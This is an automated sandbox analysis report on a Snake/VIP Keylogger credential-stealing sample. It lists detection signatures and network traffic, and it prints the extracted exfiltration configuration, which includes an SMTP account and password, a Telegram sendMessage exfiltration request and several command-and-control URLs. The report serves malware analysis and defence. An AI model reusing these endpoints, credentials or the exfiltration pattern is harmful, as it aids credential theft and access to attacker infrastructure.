Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UFOiZapHGS.exe

Overview

General Information

Sample name:UFOiZapHGS.exe
renamed because original name is a hash value
Original sample name:241a8414a8cd502eedff5360d582a8b71e0e96c188299052ff9f75a153f325b6.exe
Analysis ID:1631806
MD5:f8b14a6306cdad99cde9185c68270e8e
SHA1:5262f8babdeca9e0653c99432e4c96a4055a8458
SHA256:241a8414a8cd502eedff5360d582a8b71e0e96c188299052ff9f75a153f325b6
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • UFOiZapHGS.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\UFOiZapHGS.exe" MD5: F8B14A6306CDAD99CDE9185C68270E8E)
    • UFOiZapHGS.exe (PID: 6812 cmdline: "C:\Users\user\Desktop\UFOiZapHGS.exe" MD5: F8B14A6306CDAD99CDE9185C68270E8E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "backend@artisanfurniture.net", "Password": "6?=Ga5^dwH=F4vzm", "Host": "mail.artisanfurniture.net", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "backend@artisanfurniture.net", "Password": "6?=Ga5^dwH=F4vzm", "Host": "mail.artisanfurniture.net", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d862:$a1: get_encryptedPassword
        • 0x2db8b:$a2: get_encryptedUsername
        • 0x2d672:$a3: get_timePasswordChanged
        • 0x2d77b:$a4: get_passwordField
        • 0x2d878:$a5: set_encryptedPassword
        • 0x2ef3b:$a7: get_logins
        • 0x2ee9e:$a10: KeyLoggerEventArgs
        • 0x2eb03:$a11: KeyLoggerEventArgsEventHandler
        00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 13 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.UFOiZapHGS.exe.4305e48.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.UFOiZapHGS.exe.4305e48.4.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.UFOiZapHGS.exe.4305e48.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.UFOiZapHGS.exe.4305e48.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bc62:$a1: get_encryptedPassword
                • 0x2bf8b:$a2: get_encryptedUsername
                • 0x2ba72:$a3: get_timePasswordChanged
                • 0x2bb7b:$a4: get_passwordField
                • 0x2bc78:$a5: set_encryptedPassword
                • 0x2d33b:$a7: get_logins
                • 0x2d29e:$a10: KeyLoggerEventArgs
                • 0x2cf03:$a11: KeyLoggerEventArgsEventHandler
                0.2.UFOiZapHGS.exe.4305e48.4.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x39aa0:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x39143:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x393a0:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39d7f:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 23 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T16:11:17.280168+010028033053Unknown Traffic192.168.2.749683104.21.64.1443TCP
                2025-03-07T16:11:20.403174+010028033053Unknown Traffic192.168.2.749685104.21.64.1443TCP
                2025-03-07T16:11:23.437408+010028033053Unknown Traffic192.168.2.749687104.21.64.1443TCP
                2025-03-07T16:11:36.384798+010028033053Unknown Traffic192.168.2.749695104.21.64.1443TCP
                2025-03-07T16:11:39.401679+010028033053Unknown Traffic192.168.2.749697104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T16:11:12.120167+010028032742Potentially Bad Traffic192.168.2.749681132.226.8.16980TCP
                2025-03-07T16:11:14.870290+010028032742Potentially Bad Traffic192.168.2.749681132.226.8.16980TCP
                2025-03-07T16:11:18.203508+010028032742Potentially Bad Traffic192.168.2.749684132.226.8.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T16:11:42.495683+010018100071Potentially Bad Traffic192.168.2.749698149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: UFOiZapHGS.exeAvira: detected
                Found malware configuration
                Source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "backend@artisanfurniture.net", "Password": "6?=Ga5^dwH=F4vzm", "Host": "mail.artisanfurniture.net", "Port": "587"}
                Source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "backend@artisanfurniture.net", "Password": "6?=Ga5^dwH=F4vzm", "Host": "mail.artisanfurniture.net", "Port": "587", "Version": "4.4"}
                Multi AV Scanner detection for submitted file
                Source: UFOiZapHGS.exeVirustotal: Detection: 76%Perma Link
                Source: UFOiZapHGS.exeReversingLabs: Detection: 76%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Sample uses string decryption to hide its real strings
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: backend@artisanfurniture.net
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: 6?=Ga5^dwH=F4vzm
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: mail.artisanfurniture.net
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: hoa.nguyen@vegavvn.com
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: 587
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor:
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: backend@artisanfurniture.net
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: 6?=Ga5^dwH=F4vzm
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: mail.artisanfurniture.net
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: hoa.nguyen@vegavvn.com
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: 587
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor:
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: backend@artisanfurniture.net
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: 6?=Ga5^dwH=F4vzm
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: mail.artisanfurniture.net
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: hoa.nguyen@vegavvn.com
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor: 587
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpackString decryptor:

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: UFOiZapHGS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49682 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49698 version: TLS 1.2
                Source: UFOiZapHGS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 4x nop then jmp 0129F45Dh1_2_0129F2C0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 4x nop then jmp 0129F45Dh1_2_0129F4AC
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 4x nop then jmp 0129FC19h1_2_0129F961

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49698 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:530978%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:27:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20530978%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49684 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49681 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49685 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49697 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49683 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49695 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49687 -> 104.21.64.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49682 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:530978%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:27:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20530978%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 15:11:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:530978%0D%0ADate%20a
                Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000004058000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000004058000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en0
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002ECC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000004058000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000004058000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000004058000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002F03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002EF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/0
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002F03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
